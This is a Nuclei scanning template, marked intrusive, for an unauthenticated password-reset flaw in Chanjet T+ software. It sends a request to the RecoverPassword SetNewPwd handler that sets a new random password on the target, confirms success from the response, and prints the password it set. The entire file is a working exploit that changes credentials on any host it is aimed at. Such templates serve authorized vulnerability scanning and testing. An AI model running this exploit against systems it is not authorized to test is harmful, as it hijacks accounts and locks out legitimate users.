id: chanjet-tplus-unauth-update

info:
  name: Chanjet Tplus Unauthorized Password Update
  author: 0xr2r
  severity: high
  reference:
    - https://cn-sec.com/archives/1377207.html
    - https://www.chanjet.com
  metadata:
    verified: true
  tags: tplus,unauth,chanjet,intrusive

variables:
  password: '{{randstr}}'
  hash: '{{md5("{{password}}")}}'

http:
  - method: GET
    path:
      - "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"

    body: |
      {"pwdNew":"{{hash}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"value":true}'

      - type: word
        part: header
        words:
          - "text/plain"

      - type: status
        status:
          - 200

    extractors:
      - type: dsl
        dsl:
          - '"Password: " + password'
